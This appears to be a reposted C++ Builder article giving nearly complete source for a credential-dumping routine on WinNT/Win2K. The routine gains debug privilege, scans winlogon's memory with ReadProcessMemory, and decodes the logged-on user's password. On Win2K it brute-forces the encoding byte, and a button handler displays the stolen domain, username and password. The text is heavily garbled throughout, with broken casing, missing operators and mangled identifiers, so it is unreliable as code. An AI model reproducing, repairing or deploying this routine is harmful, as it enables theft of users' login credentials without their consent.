Get WinNTWin2K current username and password

xiaoxiao2021-04-01  226

/ / Get the WinNT / Win2K current username and password, call the following function:

// Bool GetPassword (String & Strcurrdomain, String & Strcurrpwd)

/ / -------------------------------------------------------------------------------------------- ---------------------------

Typedef

Struct _unicode_string

{

Ushort Length;

Ushort maximumlength;

PWSTR BUFFER;

} Unicode_string, * punicode_string;

Typedef

Struct _Query_system_information

{

DWORD GRANTEDACCESS;

DWORD PID;

Word handletype;

Word HandleId;

DWORD HANDLE;

} Query_system_information, * pquery_system_information;

Typedef

Struct _process_info_header

{

DWORD count;

DWORD UNK04;

DWORD UNK08;

} Process_info_header, * pprocess_info_header;

Typedef

Struct _Process_info

{

DWORD loadAddress;

DWORD size;

DWORD UNK08;

DWORD Enumerator;

DWORD UNK10;

CHAR Name [0x108];

} Process_info, * pprocess_info;

Typedef

Struct _Encoded_Password_info

{

DWORD hashbyte;

DWORD UNK04;

DWORD UNK08;

DWORD UNK0C;

Filetime Loggedon;

DWORD UNK18;

DWORD UNK1C;

DWORD UNK20;

DWORD UNK24;

DWORD UNK28;

Unicode_string encodedpassword;

} Encode_password_info, * pencoded_password_info;

TYPEDEF DWORD

__stdcall * pfnntQuerySystemInformation) (DWORD, PVOID, DWORD, PDWORD);

Typedef pvoid

__stdcall * pfnrtlcreatequerydebugbuffer (dword, dword);

TYPEDEF DWORD

__stdcall * pfnrtlQueryProcessDebugInformation) (DWORD, DWORD, PVOID);

Typedef

Void

__stdcall * pfnrtldestroyQueryDebugBuffer (PVOID);

Typedef

Void

__stdcall * pfntslrundecodeunicodeString) (Byte, Punicode_String);

// private prototypes

Bool iswinnt

Void);

Bool iswin2k (

Void);

Bool Adddebugprivilege

Void);

DWORD FINDWINLOGON

Void);

Bool LocatePasswordPagewinnt (DWORD, PDWORD);

Bool LocatePasswordPageWin2k (DWORD, PDWORD);

Void ReturnWinntPwd (String &, String &, String &); Void Returnwin2kpwd (String &, String &, String &);

Bool GetPassword (String &, String &, String &);

// Global Variables

PfnntQuerySystemInformation PfnntQuerySystemInformation;

PfnrtlcreateQueryDebugBuffer PfnrtlcreateQueryDebugBuffer;

PfnrtlQueryProcessDebuginformation PfnrtlQueryProcessDebuginformation;

PfnrtldestroyQueryDebugBuffer PfnrtldestroyQueryDebugBuffer;

Pfntstring pfnrtlrundecodeunicate odestring;

DWORD dwpwdlen = 0;

Pvoid ​​pvrealpwd = null;

PVOID PVPWD = NULL;

DWORD dwhashbyte = 0;

Wchar_t wszusername [0x400];

Wchar_t wszuserdomain [0x400];

/ / -------------------------------------------------------------------------------------------- ---------------------------

Bool getPassword (String & Strcurrdomain, String & Strcurruser, String & Strcurrpwd)

{

IF (! iswinnt () &&! iswin2k ())

{

// only suitable for 2000 or XP

Return

False;

}

// Add debug privilege to passwordreminder -

// this is needed for the search for Winlogon.

IF (! adddebugprivilege ())

{

/ / Can't add Debug privileges

Return

False;

}

// debug privilege has been successfully added to this program

Hinstance hntdll = loadingLibrary

NTDLL.DLL ");

PfnntQuerySystemInformation = (PFNNTQuerySystemInformation)

GetProcaddress (HNTDLL,

"Ntquerysysteminformation");

PfnrtlcreateQueryDebugBuffer = (PfnrtlcreateQueryDebugBuffer)

GetProcaddress (HNTDLL,

"RTLCREATEQUERYDEBUGBUGBUGFER");

PfnrtlQueryProcessDebuginformation = (PfnrtlQueryProcessDebuginformation)

GetProcaddress (HNTDLL,

"RTLQueryProcessDebuginformation");

PfnrtldestroyQueryDebugBuffer = (PfnrtLDestroyQueryDebugbuffer)

GetProcaddress (HNTDLL,

"RTLDESTROYQUERYDEBUGBUGBUGFER");

PfnrtlrundecodeunicodeString = (PfntslrundecodeunicodeString) GetProcaddress (HNTDLL,

"RTLRundecodeunicodeString");

// Locate Winlogon's PID - NEED Debug Privilege and admin Rights.

DWORD dwinlogonpid = findwinlogon ();

IF (! dwwinlogonpid)

{

/ / Can't find the process Winlogon or use nwgina.dll

/ / Causing a password that cannot be found in memory

Freelibrary (HNTDLL);

Return

False;

}

// Format ("The main process Winlogon ID is% d (0x% 8.8x) ./ n",

// arrayofconst ((int) dwwinlogonpid, (int) dwwinlogonpid))))))))))))

// set values ​​to check memory block against.

MEMSET (WSZUSERNAME, 0,

SizeOf (WSZUSERNAME);

MEMSET (WSZUSERDOMAIN, 0,

SizeOf (WSZUSERDOMAIN);

Getenvironmentvariablew (L)

"UserName", WSZUSERNAME, 0X400);

Getenvironmentvariablew (L)

"UserDomain", WSZUSERDOMAIN, 0X400);

// locate the block of memory containing

// The Password in Winlogon's Memory Space.

Bool bfoundpasswordpage;

// bFoundpasswordPage = false;

IF (iswin2k ())

BFoundPasswordPage = locatePasswordPagewin2k (dwwinlogonpid, & dwpwdlen);

Else

BFoundPasswordPage = LocatePasswordPagewinnt (dwwinlogonpid, & dwpwdlen);

IF (bFoundpasswordpage)

{

IF (dwpwdlen == 0)

{

// Format ("Landing Information is: Domain Name:% S / Password:% S. / N",

// arrayofconst (wszuserdomain, wszusername)))))))))))

// The length of the password is empty, the system has no password

}

Else

{

// Format ("Found Password,% D / N", arrayofconst ((int) dwpwdlen))))))))

// Decode the password string.

IF (iswin2k ())

ReturnWin2kpwd (StrcurRdomain, Strcurruser, StrCurrpwd);

Else

ReturnWinntPwd (StrcurRdomain, Strcurruser, StrCurrpwd);

}

}

Else

{

Freelibrary (HNTDLL);

Return

False;

}

// No password in the middle of the memory

Return

True;

}

/ / -------------------------------------------------------------------------------------------- ---------------------------

Bool iswinnt

Void)

{

OsversionInfo OsversionInfo; OsversionInfo.dwosversionInfosize =

SizeOf (OsversionInfo);

IF (GetversionEx (& OsversionInfo))

Return (OsversionInfo.dwplatformID == Ver_Platform_WIN32_NT);

Else

Return (False);

}

/ / -------------------------------------------------------------------------------------------- ---------------------------

Bool iswin2k (

Void)

{

OsversionInfo OsversionInfo;

OsversionInfo.dwosversioninfosize =

SizeOf (OsversionInfo);

IF (GetversionEx (& OsversionInfo))

Return ((OsversionInfo.dwplatformID == Ver_Platform_Win32_NT)

&& (osversioninfo.dwmajorversion == 5));

Else

Return (False);

}

/ / -------------------------------------------------------------------------------------------- ---------------------------

Bool Adddebugprivilege

Void)

{

Handle token;

Token_privileges tokenprivileges, previousstate;

DWORD RETURNLENGTH = 0;

IF (GetProcessToken (GetCurrentProcess (), Token_Query | Token_adjust_privileges, & token)

IF (lookuppprivilerage (NULL,

"SedebugPrivilege", & tokenprivileges.privileges [0] .luid))

{

Tokenprivileges.privilegectount = 1;

Tokenprivileges.privileges [0] .attributes = se_privilege_enabled;

Return (AdjustTokenprivilegege "(Token, False, & Tokenprivileges,

SizeOf (Token_Privileges), & PreviousState, & ReturnLength);

}

Return (False);

}

/ / -------------------------------------------------------------------------------------------- ---------------------------

// This article is a code provided by a friend of CCRUN (old demon). Problem or suggestion Please contact us: info@ccrun.com

// Welcome to C Builder Study http://www.ccrun.com

/ / -------------------------------------------------------------------------------------------- ---------------------------

// Note That The Following Code Eliminates the NEED

// for psapi.dll as part of the executable.

DWORD FINDWINLOGON

Void)

{

#define initial_allocation 0x100

DWORD DWRC = 0;

DWORD dwsizeneeded = 0;

Pvoid ​​Pvinfo = Heapalloc (getProcessheap (), Heap_Zero_Memory, Initial_Allocation

// Find how much memory is required.

PfnntQuerySystemInformation (0x10, pvinfo, initial_allocation, & dwsizeneed);

HeapFree (getProcessHeap (), 0, pvinfo;

// Now, Allocate The Proper Amount of Memory.

Pvinfo = Heapalloc (getProcessheap (), Heap_zero_memory, dwsizeneed;

DWORD dwsizewritten = dwsizeneed;

IF (PfnntQuerySystemInformation (0x10, Pvinfo, DWSIZIZIZENEDED, & DWSIZEWRITEN))

{

HeapFree (getProcessHeap (), 0, pvinfo;

Return (0);

}

DWORD dwnumhandles = dwsizewritten /

SIZEOF (Query_System_INFORMATION);

IF (dwnumhandles == 0)

{

HeapFree (getProcessHeap (), 0, pvinfo;

Return (0);

}

PQuery_system_information QuerySystemInformationP =

PVinfo; pvinfo;

Try

{

For (DWORD I = 1; i <= dwnumhandles; i )

{

// "5" is the value of a kernel object type process.

QuerySystemInformationP-> Handletype == 5)

{

Pvoid ​​pvdebugbuffer = pfnrtlcreateQueryDebugBuffer (0, 0);

IF (PfnrtlQueryProcessDebuginformation)

(QuerySysteminformationP-> PID, 1, PVDebugBuffer) == 0)

{

PPRocess_info_header pihprocessinfoheader =

(Pprocess_info_header) (DWORD) PVDebugBuffer 0x60);

DWORD dwcount = pihprocessinfoheader-> count;

PPROCESS_INFO PIPROCESSINFO = (PPRocess_info)

(DWORD) PIHPROCESSINFOHEADER

SIZEOF (Process_Info_Header);

// Form1-> Memo1-> lines-> add (piprocessinfo-> name);

Ansistring strname = piprocessinfo-> name;

// IF (strstr ((char *) Upcase (* piprocessinfo-> name), "Winlogon")! = 0)

IF (strname.uppercase (). POS

"Winlogon")! = 0)

{

DWORD DWTEMP = (DWORD) PiprocessInfo; for (DWORD J = 0; J

{

DWTEMP =

SIZEOF (Process_Info);

PiprocessInfo = (pprocess_info) dwtemp;

Strname = piprocessinfo-> name;

IF (strname.uppercase (). POS

"Nwgina")! = 0)

Return (0);

IF (strname.uppercase (). POS

"Msgina")! = 0)

DWRC = querysysteminformationp-> pid;

}

IF (PVDebugBuffer)

PfnrtldestroyQueryDebugBuffer (PVDebugBuffer);

HeapFree (getProcessHeap (), 0, pvinfo;

Return (DWRC);

}

}

IF (PVDebugBuffer)

PfnrtldestroyQueryDebugBuffer (PVDebugBuffer);

}

DWORD DWTEMP = (DWORD) QuerySystemInformationP;

DWTEMP =

SIZEOF (Query_System_INFORMATION);

QuerySystemInformationP = (pquery_system_information) dwtemp;

}

}

Catch (...)

{}

HeapFree (getProcessHeap (), 0, pvinfo;

Return (DWRC);

}

/ / -------------------------------------------------------------------------------------------- ---------------------------

Bool LocatePasswordPagewinnt (DWORD DWWINLOGONPID, PDWORD PDWPWPWDLEN)

{

#define user_domain_offset_winnt 0x200

#define user_password_offset_winnt 0x400

BOOL BRC = false;

Handle hwinlogonhandle = OpenProcess (process_query_information | process_vm_read,

False, dwwinlogonpid;

IF (! hwinlogonhandle)

Return (BRC);

* pdwpwdlen = 0;

System_info sisysteminfo;

GetSystemInfo (& SISYSTEMINFO);

DWORD DWPEB = 0x7ffdf000;

DWORD DWBYTESCOPIED = 0;

PVOID PVEBP = HeapAlloc (getProcessheap (), Heap_zero_memory, sisysteminfo.dwpagesize;

IF (! ReadProcessMemory (Hwinlogonhandle, (PVOID) DWPEB, PVEBP,

Sisysteminfo.dwageSize, & dwbytescopied))

{

CloseHandle (HwinLogonhandle);

Return (BRC);

}

// grab the value of the 2nd dword in the teb.

PDWORD PDWINLOGONHEAP = (PDWORD) ((DWORD) PVEBP (6 * sizeof (dword)));

Memory_basic_information mbimemorybasicinfor;

IF (VirtualQueryex (HwinLogonhandle, (PVOID) * Pdwwinlogonheap,

& mbimemorybasicinfor,

SIZEOF (Memory_basic_information))))))))))))))))

IF ((MbimeMoryBasicinfor .State & Mem_Commit) == MEM_COMMIT) &&

((MbimeMoryBasicinFor.Protect & Page_guard) == 0))

{

Pvoid ​​pvwinlogonmem = heapalloc (getProcessheap (), Heap_zero_memory,

MbimeMoryBasicinFor.Regionsize);

IF (Hwinlogonhandle, (PVOID) * pdwwinlogonheap,

PvwinlogonMem, MbimeMoryBasicinFor.Regionsize, & dwbytescopied))

{

DWORD I = (dword) pvwinlogonmem;

DWORD dwusernamepos = 0;

// The order in memory is wszusername backed by the wszuserdomain.

DO

{

IF ((WSZUSERNAME)

Wchar_t *) i) == 0) &&

(WCSCMP (WSZUSERDOMAIN,

Wchar_t *)

(i user_domain_offset_winnt)) == 0))

{

dwusernamepos = i;

Break;

}

i = 2;

}

While (i <(dword) pvwinlogonmem mbimemorybasicinfor.regionsize;

IF (dwusernamepos)

{

Pencoded_password_info pepiencodedpwdinfo =

(Pencoded_password_info) (DWORD) DWUSERNAMEPOS

User_password_offset_winnt);

Filetime ftlocalfiletime;

SystemTime StsystemTime;

IF (FileTimetolocalFiletime (& PepiencodedPwdInfo-> Loggedon,

& ftlocalfiletime)))

IF (FileTimetosystemTime (& FTLOCALFILETIME, & STSYSTEMTIME))

{}

// Format ("Your login time is:% D /% D /% D% D:% D:% D / N",

// arrayofconst ((stsystemtime.wmonth, stsystemtime.wday,

// stsystemtime.wyear, stsystemtime.whour,

// stsystemtime.wminute, stsystemtime.wsecond)))))))))))))))))

* pdwpwdlen = (pepiencodedpwdinfo-> encodedpassword.length

& 0x00FF) /

Sizeof

Wchar_t);

DWHASHBYTE = (pepiencodedpwdinfo-> EncodedPassword.length

& 0xff00) >> 8;

PVRealPwd = (PVOID) (* Pdwwinlogonheap (dwusernamepos -

(DWORD) PVWINLOGONMEM) User_password_offset_winnt 0x34);

PVPWD = (PVOID) (PBYTE) (dwusernamepos

User_password_offset_winnt 0x34)));

BRC = true;

}

}

}

HeapFree (getProcessHeap (), 0, PVEBP);

CloseHandle (HwinLogonhandle);

Return (BRC);

}

/ / -------------------------------------------------------------------------------------------- ---------------------------

Bool LocatePasswordPageWin2k (DWORD DWWINLOGONPID, PDWORD PDWPWPWDLEN)

{

#define user_domain_offset_win2k 0x400

#define user_password_offset_win2k 0x800

Handle HwinlogonHandle = OpenProcess (Process_Query_Information |

Process_vm_read, false, dwwinlogonpid;

IF (hwinlogonhandle == 0)

Return (False);

* pdwpwdlen = 0;

System_info sisysteminfo;

GetSystemInfo (& SISYSTEMINFO);

DWORD I = (dword) sisysteminfo.lpminimumApplicationAddress;

DWORD dwmaxmemory = (dword) sisysteminfo.lpmaximumApplicationAddress;

DWORD dwincrement = sisysteminfo.dwagesize;

Memory_basic_information mbimemorybasicinfor;

While (i

{

IF (VirtualQueryex (Hwinlogonhandle, (PVOID) I, & MbimeMoryBasicinfor,

SIZEOF (Memory_basic_information))))))))))))))))

{

Dwincrement = mbimemorybasicinfor.regionsize;

IF ((MbimeMoryBasicinfor .State & Mem_Commit) == MEM_COMMIT) &&

((MbimeMoryBasicinFor.Protect & Page_guard) == 0))

{

Pvoid ​​pvrealstartingaddress = Heapalloc (getProcessHeap (),

Heap_zero_memory, mbimemorybasicinfor.regionsize;

DWORD DWBYTESCOPIED = 0;

IF (Hwinlogonhandle, (PVOID) i, PVRealStartingAddress,

MbimemoryBasicinFor.Regionsize, & dwbytescopied) {

IF ((WCSCMP)

Wchar_t *) pvrealStartingAddress, WSZUSERNAME) == 0)

&& (WCSCMP)

Wchar_t *) (DWORD) PVREALSTARTINGADDRESS

User_domain_offset_win2k), WSZUSERDOMAIN) == 0))

{

PVRealPwd = (pvoid) (i user_password_offset_win2k);

PVPWD = (PVOID) (DWORD) PVREALSTARTINGDRESS

User_password_offset_win2k);

// Calculate The Length of Encoded Unicode String.

PBYTE PBTEMP = (pbyte) pvpwd;

DWORD dwloc = (dword) pbtemp;

DWORD DWLEN = 0;

IF ((* PbTemp == 0) && (* (pbyte) (DWORD) PBTEMP 1) == 0))

{}

Else

DO

{

DWLEN ;

DWLOC = 2;

PBTEMP = (pbyte) dwloc;

}

While (* pbTemp! = 0);

* pdwpwdlen = dwlen;

CloseHandle (HwinLogonhandle);

Return (TRUE);

}

}

HeapFree (getProcessHeap (), 0, PVREALSTARTINGDRESS;

}

}

Else

Dwincrement = sisysteminfo.dwpagesize;

// Move to Next Memory Block.

i = dwincrement;

}

CloseHandle (HwinLogonhandle);

Return (False);

}

/ / -------------------------------------------------------------------------------------------- ---------------------------

Void ReturnwinntPwd (String & Strcurrdomain, String & Strcurrpwd)

{

Unicode_string uSencodedString;

UsencodedString.Length = (Word) dwpwdlen *

Sizeof

Wchar_t);

UsencodedString.maximumLength =

(Word) DWPWDLEN *

Sizeof

Wchar_t))

Sizeof

Wchar_t);

Usencodedstring.buffer = (pwstr) Heapalloc (getProcessHeap (),

HEAP_ZERO_MEMORY, UsencodedString.MaxImumlength;

CopyMemory (usecodedstring.buffer, pvpwd, dwpwdlen *

Sizeof

Wchar_t));

// finally - decode the password.

// Note That Only One Call Is Required Since The Hash-Byte

// Was Part of the Orginally Encode String.pfnrtlrundecodeUnicodestring (Byte) DWHASHBYTE, & UsencodedString;

Strcurrdomain = string (wszuserdomain);

Strincurruser = string (wszusername);

Strcurrpwd = Ansistring (usencodedstring.buffer);

// Format ("Your login information is a domain name:% s username:% s password:% s / n",

// arrayofconst (wszuserdomain, wszusername, usncodedstring.buffer)))))))))))))

// Format ("THE HASH BYTE IS: 0x% 2.2x. / N", ArrayOfconst ((int) dwhashbyte))))))))))

HeapFree (getProcessHeap (), 0, useencodedstring.buffer;

}

/ / -------------------------------------------------------------------------------------------- ---------------------------

Void ReturnWin2kpwd (String & Strcurrdomain, String & Strcurrpwd)

{

// DWORD dwhash = 0;

Unicode_string uSencodedString;

UsencodedString.Length = (Ushort) dwpwdlen *

Sizeof

Wchar_t);

UsencodedString.maximumLength =

(USHORT) DWPWDLEN *

Sizeof

Wchar_t))

Sizeof

Wchar_t);

Usencodedstring.buffer = (pwstr) Heapalloc (getProcessHeap (),

HEAP_ZERO_MEMORY, UsencodedString.MaxImumlength;

// this is a brute force technique since the hash-byte

// is not stored as part of the Encode string -:> (.

For (DWORD I = 0; i <= 0xff; i )

{

CopyMemory (usecodedstring.buffer, pvpwd, dwpwdlen *

Sizeof

Wchar_t));

// finally - try to decode the password.

PfnrtlrundecodeunicodeString (Byte) I, & UseNCodedString;

// Check for a viewable password.

PBYTE PBTEMP = (Pbyte) UsencodedString.Buffer;

Bool bview = true;

DWORD J, K;

For (j = 0; (j

{

IF ((* pbtemp) && (* (pbyte) (DWORD (PBTEMP) 1) == 0))

{

IF (* PbTemp <0x20)

BVIEWABLE = FALSE;

IF (* PbTemp> 0x7e) BVIEWABLE = FALSE;

}

Else

BVIEWABLE = FALSE;

K = DWORD (PBTEMP);

K = 2;

Pbtemp = (pbyte) k;

}

IF (BViewable)

{

Strcurrdomain = string (wszuserdomain);

Strincurruser = string (wszusername);

Strcurrpwd = string (usecodedstring.buffer);

// Format ("Your landing information is: Domain Name:% s User Name:% s Password:% S / N",

// arrayofconst (wszuserdomain, wszusername, usncodedstring.buffer)))))))))))))

// Format ("The Hash Byte IS: 0x% 2.2x. / N", ArrayOfconst ((int) i))))))))))))

}

}

HeapFree (getProcessHeap (), 0, useencodedstring.buffer;

}

/ / -------------------------------------------------------------------------------------------- ---------------------------

// call example

Void

__fastcall tform1 :: Button1click (TOBJECT * Sender)

{

String strcurdomain, strcurruser, strcurrpwd;

GetPassword (StrcurRdomain, Strcurruser, StrCurrpwd);

Memo1-> lines-> add (strcurrdomain);

Memo1-> Lines-> Add (strcurruser);

Memo1-> Lines-> Add (strcurrpwd);

}

转载请注明原文地址:https://www.9cbs.com/read-131117.html

New Post(0)